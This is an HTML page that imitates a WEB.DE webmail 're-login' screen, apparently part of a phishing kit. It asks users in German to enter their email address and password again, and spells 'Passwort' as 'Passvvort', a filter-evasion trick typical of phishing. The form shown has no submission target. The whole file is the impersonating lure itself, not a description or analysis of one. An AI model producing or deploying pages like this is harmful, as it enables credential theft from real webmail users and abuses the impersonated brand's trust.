<!DOCTYPE html>

<head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>WEB.DE</title>
    <style>
        body {
            font-family: sans-serif;
            background: #f3f3f3;
        }
        
        main {
            display: flex;
            justify-content: center;
        }
        
        .form-group {
            margin-bottom: 5%;
            border-radius: 5px;
        }
        
        .img {
            display: flex;
            padding-left: 2%;
            padding-top: 1%;
            justify-content: left;
            background-color: white;
            border-top: 4px solid #ffd800;
            padding: 8px;
            border-top-color: #ffd800;
            outline: none;
        }
        
        div {
            text-align: center;
        }
        
        form {
            margin: 2em 10%;
            width: 80%;
        }
        
        input[type="text"],
        select,
        textarea {
            width: 100%;
            padding: 0.5em;
        }
    </style>

</head>

<body>
    <header>
        <div class="img">
            <img src="image/download.png" alt="Not supported" width="15%" height="auto">
            <div class="search">
            </div>
        </div>
        <div>
            <h1>Bitte erneut einloggen</h1>
        </div>

        <div>
            <p>Bitte melden Sie sich mit Ihrem WEB.DE Benutzernamen und Passvvort erneut an.</p>
        </div>
    </header>

    <main>
        <form>
            <div class="form-group">
                <input type="text" style="width:250px;" placeholder="WEB.DE E-mail Addresse" maxlength="50" required>
            </div>

            <div class="form-group">
                <input type="text" style="width:250px;" placeholder="Passvvort eingeben" required>
            </div>

            <div class="form-group">
                <input type="submit" value="Login" style="background-color:#ffd800; border-radius: 3px; border-width:0; width:30%; height:30px">
            </div>
        </form>
    </main>
</body>

</html>